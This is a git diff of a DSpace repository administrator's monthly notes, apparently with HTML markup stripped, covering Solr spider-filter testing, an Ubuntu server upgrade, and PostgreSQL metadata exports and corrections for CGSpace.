        @@ -247,7 +247,7 @@ $ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/cs
    -
    else if (line.hasOption('m'))
    +
    else if (line.hasOption('m'))
     {
         SolrLogger.markRobotsByIP();
     }
    @@ -263,16 +263,16 @@ $ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/cs
     
    • I added “alanfuuu2” to the example spiders file, restarted Tomcat, then made two requests to DSpace Test:
    -
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"alanfuuu1"
    -$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"alanfuuu2"
    +
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"alanfuuu1"
    +$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"alanfuuu2"
     
    • After committing the changes in Solr I saw one request for “alanfuuu1” and no requests for “alanfuuu2”:
    -
    $ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
    -$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu1&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
    -  <result name="response" numFound="1" start="0">
    -$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu2&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
    -  <result name="response" numFound="0" start="0"/>
    +
    $ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
    +$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu1&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
    +  <result name="response" numFound="1" start="0">
    +$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu2&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
    +  <result name="response" numFound="0" start="0"/>
     
    • So basically it seems like a win to update the example file with the latest one from Atmire’s COUNTER-Robots list
        @@ -281,16 +281,16 @@ $ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanf
      • I’m curious how special character matching works in Solr, so I will test two requests: one with “www.gnip.com”, which is in the spider list, and one with “www.gnyp.com”, which isn’t:
      -
      $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"www.gnip.com"
      -$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"www.gnyp.com"
      +
      $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"www.gnip.com"
      +$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"www.gnyp.com"
       
      • Then commit changes to Solr so we don’t have to wait:
      -
      $ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
      -$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnip.com&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound 
      -  <result name="response" numFound="0" start="0"/>
      -$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnyp.com&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
      -  <result name="response" numFound="1" start="0">
      +
      $ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
      +$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnip.com&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound 
      +  <result name="response" numFound="0" start="0"/>
      +$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnyp.com&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
      +  <result name="response" numFound="1" start="0">
       
      • So the blocking seems to be working because “www.gnip.com” is one of the new patterns added to the spiders file…
      @@ -314,24 +314,24 @@ $ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.g
    -
    $ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:BUbiNG*' | xmllint --format - | grep numFound
    -  <result name="response" numFound="62944" start="0">
    +
    $ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:BUbiNG*' | xmllint --format - | grep numFound
    +  <result name="response" numFound="62944" start="0">
     
    • Similar for com.plumanalytics, Grammarly, and ltx71!
    -
    $ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:
    -*com.plumanalytics*' | xmllint --format - | grep numFound
    -  <result name="response" numFound="28256" start="0">
    -$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:*Grammarly*' | xmllint --format - | grep numFound
    -  <result name="response" numFound="6288" start="0">
    -$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:*ltx71*' | xmllint --format - | grep numFound
    -  <result name="response" numFound="105663" start="0">
    +
    $ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:
    +*com.plumanalytics*' | xmllint --format - | grep numFound
    +  <result name="response" numFound="28256" start="0">
    +$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:*Grammarly*' | xmllint --format - | grep numFound
    +  <result name="response" numFound="6288" start="0">
    +$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:*ltx71*' | xmllint --format - | grep numFound
    +  <result name="response" numFound="105663" start="0">
     
    • Deleting these seems to work, for example the 105,000 ltx71 records from 2018:
    -
    $ http --print b 'http://localhost:8081/solr/statistics-2018/update?stream.body=<delete><query>userAgent:*ltx71*</query><query>type:0</query></delete>&commit=true'
    -$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:*ltx71*' | xmllint --format - | grep numFound
    -  <result name="response" numFound="0" start="0"/>
    +
    $ http --print b 'http://localhost:8081/solr/statistics-2018/update?stream.body=<delete><query>userAgent:*ltx71*</query><query>type:0</query></delete>&commit=true'
    +$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:*ltx71*' | xmllint --format - | grep numFound
    +  <result name="response" numFound="0" start="0"/>
     
    • I wrote a quick bash script to check all these user agents against the CGSpace Solr statistics cores
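A rough idea of what such a check could look like is sketched below. This is not the script itself: `SOLR_URL`, `print_queries`, and the one-pattern-per-line input file are assumptions made for illustration, and the function only prints the `curl` commands (a dry run) rather than contacting Solr.

```shell
#!/bin/sh
# Sketch only: SOLR_URL, print_queries, and the input file format are
# hypothetical, not taken from the actual script.
SOLR_URL="http://localhost:8081/solr"

# Usage: print_queries PATTERNS_FILE CORE [CORE...]
# Prints one curl command per (core, user agent) pair without running it.
print_queries() {
    patterns_file=$1
    shift
    for core in "$@"; do
        while IFS= read -r agent; do
            # Skip blank lines and comment lines
            case $agent in
                ''|'#'*) continue ;;
            esac
            printf "curl -s '%s/%s/select' -d 'q=userAgent:*%s*&rows=0'\n" \
                "$SOLR_URL" "$core" "$agent"
        done < "$patterns_file"
    done
}

# Example: two of the agents above, checked against two statistics cores
agents_file=$(mktemp)
printf '%s\n' 'ltx71' 'Grammarly' > "$agents_file"
print_queries "$agents_file" statistics statistics-2018
rm -f "$agents_file"
```

Printing the commands first makes it easy to eyeball the queries before pointing them at a production Solr instance.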
        @@ -341,21 +341,21 @@ $ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&a
    -
    $ curl -s 'http://localhost:8081/solr/statistics/select?facet=true&facet.field=dateYearMonth&facet.mincount=1&facet.offset=0&facet.limit=
    -12&q=userAgent:*Unpaywall*' | xmllint --format - | less
    +
    $ curl -s 'http://localhost:8081/solr/statistics/select?facet=true&facet.field=dateYearMonth&facet.mincount=1&facet.offset=0&facet.limit=
    +12&q=userAgent:*Unpaywall*' | xmllint --format - | less
     ...
    -  <lst name="facet_counts">
    -    <lst name="facet_queries"/>
    -    <lst name="facet_fields">
    -      <lst name="dateYearMonth">
    -        <int name="2019-10">198624</int>
    -        <int name="2019-05">88422</int>
    -        <int name="2019-06">79911</int>
    -        <int name="2019-09">67065</int>
    -        <int name="2019-07">39026</int>
    -        <int name="2019-08">36889</int>
    -        <int name="2019-04">36512</int>
    -        <int name="2019-11">760</int>
    +  <lst name="facet_counts">
    +    <lst name="facet_queries"/>
    +    <lst name="facet_fields">
    +      <lst name="dateYearMonth">
    +        <int name="2019-10">198624</int>
    +        <int name="2019-05">88422</int>
    +        <int name="2019-06">79911</int>
    +        <int name="2019-09">67065</int>
    +        <int name="2019-07">39026</int>
    +        <int name="2019-08">36889</int>
    +        <int name="2019-04">36512</int>
    +        <int name="2019-11">760</int>
           </lst>
         </lst>
     
      @@ -423,17 +423,17 @@ istics-2014 statistics-2013 statistics-2012 statistics-2011 statistics-2010; do
    • Testing modifying some of the COUNTER-Robots patterns to use [0-9] instead of \d digit character type, as Solr’s regex search can’t use those
    -
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"Scrapoo/1"
    -$ http "http://localhost:8081/solr/statistics/update?commit=true"
    -$ http "http://localhost:8081/solr/statistics/select?q=userAgent:Scrapoo*" | xmllint --format - | grep numFound
    -  <result name="response" numFound="1" start="0">
    -$ http "http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/[0-9]/" | xmllint --format - | grep numFound
    -  <result name="response" numFound="1" start="0">
    +
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"Scrapoo/1"
    +$ http "http://localhost:8081/solr/statistics/update?commit=true"
    +$ http "http://localhost:8081/solr/statistics/select?q=userAgent:Scrapoo*" | xmllint --format - | grep numFound
    +  <result name="response" numFound="1" start="0">
    +$ http "http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/[0-9]/" | xmllint --format - | grep numFound
    +  <result name="response" numFound="1" start="0">
     
    • Nice, so searching with regex in Solr with // syntax works for those digits!
    • I realized that it’s easier to search Solr from curl via POST using this syntax:
    -
    $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=userAgent:*Scrapoo*&rows=0"
    +
    $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=userAgent:*Scrapoo*&rows=0"
     
    • If the parameters include something like “[0-9]” then curl interprets it as a range and will make ten requests
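When the pattern does have to go in the URL, one way around the range expansion is to percent-encode the square brackets first. The sketch below uses a hypothetical `encode_brackets` helper and only handles `[` and `]`, not full URL encoding.

```shell
#!/bin/sh
# Hypothetical helper: percent-encode square brackets so curl does not
# treat "[0-9]" in a URL as a range to expand. Other characters are untouched.
encode_brackets() {
    printf '%s\n' "$1" | sed -e 's/\[/%5B/g' -e 's/]/%5D/g'
}

# Example with the Scrapoo pattern used above
encode_brackets 'userAgent:/Scrapoo\/[0-9]/'

# Alternatively, curl's -g / --globoff option switches off URL globbing entirely.
```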
        @@ -441,7 +441,7 @@ $ http "http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/
    -
    $ curl -s 'http://localhost:8081/solr/statistics/select' -d 'q=userAgent:/Postgenomic(\s|\+)v2/&rows=2'
    +
    $ curl -s 'http://localhost:8081/solr/statistics/select' -d 'q=userAgent:/Postgenomic(\s|\+)v2/&rows=2'
     
    • I updated the check-spider-hits.sh script to use the POST syntax, and I’m evaluating the feasibility of including the regex search patterns from the spider agent file, as I had been filtering them out due to differences in PCRE and Solr regex syntax and issues with shell handling
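As an illustration of the PCRE versus Solr difference noted earlier (`\d` versus `[0-9]`), a pattern file could be rewritten with a one-line `sed` filter. This is a minimal sketch: `pcre_digits_to_solr` is a hypothetical name, `ExampleBot` is a made-up agent, and the filter does not handle an escaped backslash followed by a literal `d`.

```shell
#!/bin/sh
# Hypothetical filter: rewrite the PCRE digit class \d as [0-9] on stdin.
# Caveat: a literal backslash followed by "d" (written \\d) would also be rewritten.
pcre_digits_to_solr() {
    sed 's/\\d/[0-9]/g'
}

# Example: one pattern from the test above and one made-up pattern
printf '%s\n' 'Scrapoo\/\d' 'ExampleBot\/\d+' | pcre_digits_to_solr
```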
    @@ -450,7 +450,7 @@ $ http "http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/
  • IWMI sent a few new ORCID identifiers for us to add to our controlled vocabulary
  • I will merge them with our existing list and then resolve their names using my resolve-orcids.py script:
  • -
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2019-11-14-combined-orcids.txt
    +
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2019-11-14-combined-orcids.txt
     $ ./resolve-orcids.py -i /tmp/2019-11-14-combined-orcids.txt -o /tmp/2019-11-14-combined-names.txt -d
     # sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
     $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
    diff --git a/docs/2019-12/index.html b/docs/2019-12/index.html
    index 9cd3df678..061bf5438 100644
    --- a/docs/2019-12/index.html
    +++ b/docs/2019-12/index.html
    @@ -46,7 +46,7 @@ Make sure all packages are up to date and the package manager is up to date, the
     # dpkg -C
     # reboot
     "/>
    -
    +
     
     
         
    @@ -153,7 +153,7 @@ Make sure all packages are up to date and the package manager is up to date, the
     # tar czf 2019-12-01-linode18-etc.tar.gz /etc
     
    • Then check all third-party repositories in /etc/apt to see if everything using “xenial” has packages available for “bionic” and then update the sources:
    • -
    • # sed -i ’s/xenial/bionic/' /etc/apt/sources.list.d/*.list
    • +
    • # sed -i ’s/xenial/bionic/’ /etc/apt/sources.list.d/*.list
    • Pause the Uptime Robot monitoring for CGSpace
    • Make sure the update manager is installed and do the upgrade:
    @@ -163,7 +163,7 @@ Make sure all packages are up to date and the package manager is up to date, the
  • After the upgrade finishes, remove Java 11, force the installation of bionic nginx, and reboot the server:
  • # apt purge openjdk-11-jre-headless
    -# apt install 'nginx=1.16.1-1~bionic'
    +# apt install 'nginx=1.16.1-1~bionic'
     # reboot
     
    • After the server comes back up, remove Python virtualenvs that were created with Python 3.5 and re-run certbot to make sure it’s working:
    • @@ -195,8 +195,8 @@ Make sure all packages are up to date and the package manager is up to date, the
    -
    $ http 'https://cgspace.cgiar.org/oai/request?verb=GetRecord&metadataPrefix=oai_dc&identifier=oai:cgspace.cgiar.org:10568/104030' > /tmp/cgspace-104030.xml
    -$ http 'https://dspacetest.cgiar.org/oai/request?verb=GetRecord&metadataPrefix=oai_dc&identifier=oai:cgspace.cgiar.org:10568/104030' > /tmp/dspacetest-104030.xml
    +
    $ http 'https://cgspace.cgiar.org/oai/request?verb=GetRecord&metadataPrefix=oai_dc&identifier=oai:cgspace.cgiar.org:10568/104030' > /tmp/cgspace-104030.xml
    +$ http 'https://dspacetest.cgiar.org/oai/request?verb=GetRecord&metadataPrefix=oai_dc&identifier=oai:cgspace.cgiar.org:10568/104030' > /tmp/dspacetest-104030.xml
     
    • The DSpace Test ones actually now capture the DOI, whereas the CGSpace ones don’t…
    • And the DSpace Test one doesn’t include review status as dc.description, but I don’t think that’s an important field
    • @@ -209,11 +209,11 @@ $ http 'https://dspacetest.cgiar.org/oai/request?verb=GetRecord&metadataPref
    -
    dspace=# \COPY (SELECT handle, owning_collection FROM item, handle WHERE item.discoverable='f' AND item.in_archive='t' AND handle.resource_id = item.item_id) to /tmp/2019-12-04-CGSpace-private-items.csv WITH CSV HEADER;
    +
    dspace=# \COPY (SELECT handle, owning_collection FROM item, handle WHERE item.discoverable='f' AND item.in_archive='t' AND handle.resource_id = item.item_id) to /tmp/2019-12-04-CGSpace-private-items.csv WITH CSV HEADER;
     COPY 48
     

    2019-12-05

      -
    • Give presentation about CG Core v2 to the MEL Developers' Retreat in Nairobi, Kenya (via Skype)
    • +
    • Give presentation about CG Core v2 to the MEL Developers’ Retreat in Nairobi, Kenya (via Skype)
    • Send some pull requests to the cg-core schema repository:
      • HTML syntax fixes
      • @@ -288,14 +288,14 @@ COPY 48
      • I looked into creating RTF documents from HTML in Node.js and there is a library called html-to-rtf that works well, but doesn’t support images
      • Export a list of all investors (dc.description.sponsorship) for Peter to look through and correct:
      -
      dspace=# \COPY (SELECT DISTINCT text_value as "dc.contributor.sponsor", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-12-17-investors.csv WITH CSV HEADER;
      +
      dspace=# \COPY (SELECT DISTINCT text_value as "dc.contributor.sponsor", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-12-17-investors.csv WITH CSV HEADER;
       COPY 643
       

      2019-12-18

      • Apply the investor corrections and deletions from Peter on CGSpace:
      -
      $ ./fix-metadata-values.py -i /tmp/2019-12-17-investors-fix-112.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
      -$ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
      +
      $ ./fix-metadata-values.py -i /tmp/2019-12-17-investors-fix-112.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
      +$ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
       
      • Peter asked about the “Open Government Licence 3.0” that is used by some items
          @@ -304,13 +304,13 @@ $ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dsp
      -
      dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open%';
      +
      dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open%';
                text_value          
       -----------------------------
        Open Government License 3.0
        Open Government License 3.0
       (2 rows)
      -dspace=# UPDATE metadatavalue SET text_value='OGL-UK-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open Government License 3.0%';
      +dspace=# UPDATE metadatavalue SET text_value='OGL-UK-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open Government License 3.0%';
       UPDATE 2
       
      • I created a pull request to add the license and merged it to the 5_x-prod branch (#440)
      • @@ -338,12 +338,12 @@ UPDATE 2
        • I ran the dspace cleanup process on CGSpace (linode18) and had an error:
        -
        Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
        -  Detail: Key (bitstream_id)=(179441) is still referenced from table "bundle".
        +
        Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
        +  Detail: Key (bitstream_id)=(179441) is still referenced from table "bundle".
         
        • The solution is to delete that bitstream manually:
        -
        $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (179441);'
        +
        $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (179441);'
         UPDATE 1
         
        • Adjust CG Core v2 migration notes to use cg.review-status instead of cg.peer-reviewed diff --git a/docs/2020-01/index.html b/docs/2020-01/index.html index e091d2bd4..ce599ff12 100644 --- a/docs/2020-01/index.html +++ b/docs/2020-01/index.html @@ -56,7 +56,7 @@ I tweeted the CGSpace repository link "/> - + @@ -166,7 +166,7 @@ I tweeted the CGSpace repository link
          • Export a list of authors from CGSpace for Peter Ballantyne to look through and correct:
          -
          dspace=# \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-08-authors.csv WITH CSV HEADER;
          +
          dspace=# \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-08-authors.csv WITH CSV HEADER;
           COPY 68790
           
          • As I always have encoding issues with files Peter sends, I tried to convert it to some Windows encoding, but got an error:
          • @@ -176,10 +176,10 @@ iconv: illegal input sequence at position 104779
          • According to this trick the troublesome character is on line 5227:
          -
          $ awk 'END {print NR": "$0}' /tmp/2020-01-08-authors-windows.csv                                   
          -5227: "Oue
          -$ sed -n '5227p' /tmp/2020-01-08-authors.csv | xxd -c1
          -00000000: 22  "
          +
          $ awk 'END {print NR": "$0}' /tmp/2020-01-08-authors-windows.csv                                   
          +5227: "Oue
          +$ sed -n '5227p' /tmp/2020-01-08-authors.csv | xxd -c1
          +00000000: 22  "
           00000001: 4f  O
           00000002: 75  u
           00000003: 65  e
          @@ -225,30 +225,30 @@ java.net.SocketTimeoutException: Read timed out
           
      -
      In [7]: unicodedata.is_normalized('NFC', 'é')
      +
      In [7]: unicodedata.is_normalized('NFC', 'é')
       Out[7]: False
       
      -In [8]: unicodedata.is_normalized('NFC', 'é')
      +In [8]: unicodedata.is_normalized('NFC', 'é')
       Out[8]: True
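The two IPython checks above look identical on screen because the same visible character can be stored either as one precomposed code point or as a base letter plus a combining mark. A minimal sketch of the difference, assuming Python 3.8 or newer (where `unicodedata.is_normalized` is available); the helper name `to_nfc` is only illustrative and is not taken from csv-metadata-quality:

```python
import unicodedata

# The same visible character in two encodings
decomposed = "e\u0301"  # 'e' followed by U+0301 COMBINING ACUTE ACCENT
composed = "\u00e9"     # single precomposed code point U+00E9


def to_nfc(value: str) -> str:
    """Return value in NFC form, leaving already-normalized strings untouched."""
    if unicodedata.is_normalized("NFC", value):
        return value
    return unicodedata.normalize("NFC", value)


print(unicodedata.is_normalized("NFC", decomposed))  # False
print(unicodedata.is_normalized("NFC", composed))    # True
print(to_nfc(decomposed) == composed)                # True
```

Checking with `is_normalized` first is optional, since `normalize` is safe to call on strings that are already in NFC.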
       

      2020-01-15

      • I added support for Unicode normalization to my csv-metadata-quality tool in v0.4.0
      • Generate ILRI and Bioversity subject lists for Elizabeth Arnaud from Bioversity:
      -
      dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.ilri", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 203 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-ilri-subjects.csv WITH CSV HEADER;
      +
      dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.ilri", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 203 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-ilri-subjects.csv WITH CSV HEADER;
       COPY 144
      -dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.bioversity", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 120 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-bioversity-subjects.csv WITH CSV HEADER;
      +dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.bioversity", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 120 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-bioversity-subjects.csv WITH CSV HEADER;
       COPY 1325
       
      • She will be meeting with FAO and will look over the terms to see if they can add some to AGROVOC
      • I noticed a few errors in the ILRI subjects so I fixed them locally and on CGSpace (linode18) using my fix-metadata-values.py script:
      -
      $ ./fix-metadata-values.py -i 2020-01-15-fix-8-ilri-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.ilri -m 203 -t correct -d
      +
      $ ./fix-metadata-values.py -i 2020-01-15-fix-8-ilri-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.ilri -m 203 -t correct -d
       

      2020-01-16

      • Extract a list of CIAT subjects from CGSpace for Elizabeth Arnaud from Bioversity:
      -
      dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.ciat", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 122 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-16-ciat-subjects.csv WITH CSV HEADER;
      +
      dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.ciat", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 122 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-16-ciat-subjects.csv WITH CSV HEADER;
       COPY 35
       
      • Start examining the 175 IITA records that Bosede originally sent in October, 2019 (201907.xls) @@ -315,15 +315,15 @@ COPY 35
    -
    $ ./fix-metadata-values.py -i /tmp/2020-01-08-fix-2302-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct -d
    +
    $ ./fix-metadata-values.py -i /tmp/2020-01-08-fix-2302-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct -d
     
    • Then I decided to export them again (with two author columns) so I can perform the new Unicode normalization mode I added to csv-metadata-quality:
    -
    dspace=# \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-authors.csv WITH CSV HEADER;
    +
    dspace=# \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-authors.csv WITH CSV HEADER;
     COPY 67314
     dspace=# \q
    -$ csv-metadata-quality -i /tmp/2020-01-22-authors.csv -o /tmp/authors-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],dc.contributor.author'
    -$ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
    +$ csv-metadata-quality -i /tmp/2020-01-22-authors.csv -o /tmp/authors-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],dc.contributor.author'
    +$ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
     
    • Peter asked me to send him a list of affiliations to correct
        @@ -331,11 +331,11 @@ $ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -
    -
    dspace=# \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", text_value as "correct", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
    +
    dspace=# \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", text_value as "correct", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
     COPY 6170
     dspace=# \q
    -$ csv-metadata-quality -i /tmp/2020-01-22-affiliations.csv -o /tmp/affiliations-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
    -$ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -n
    +$ csv-metadata-quality -i /tmp/2020-01-22-affiliations.csv -o /tmp/affiliations-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
    +$ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -n
     
    • I applied the corrections on DSpace Test and CGSpace, and then scheduled a full Discovery reindex for later tonight:
    @@ -343,7 +343,7 @@ $ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dsp
    • Then I generated a new list for Peter:
    -
    dspace=# \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
    +
    dspace=# \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
     COPY 6162
     
    • Abenet said she noticed that she gets different results on AReS and Atmire Listing and Reports, for example with author “Hung, Nguyen” @@ -352,8 +352,8 @@ COPY 6162
    -
    $ in2csv AReS-1-801dd394-54b5-436c-ad09-4f2e25f7e62e.xlsx | sed -E 's/10568 ([0-9]+)/10568\/\1/' | csvcut -c Handle | grep -v Handle | sort -u > hung-nguyen-ares-handles.txt
    -$ grep -oE '10568\/[0-9]+' hung-nguyen-atmire.txt | sort -u > hung-nguyen-atmire-handles.txt
    +
    $ in2csv AReS-1-801dd394-54b5-436c-ad09-4f2e25f7e62e.xlsx | sed -E 's/10568 ([0-9]+)/10568\/\1/' | csvcut -c Handle | grep -v Handle | sort -u > hung-nguyen-ares-handles.txt
    +$ grep -oE '10568\/[0-9]+' hung-nguyen-atmire.txt | sort -u > hung-nguyen-atmire-handles.txt
     $ wc -l hung-nguyen-a*handles.txt
       46 hung-nguyen-ares-handles.txt
       56 hung-nguyen-atmire-handles.txt
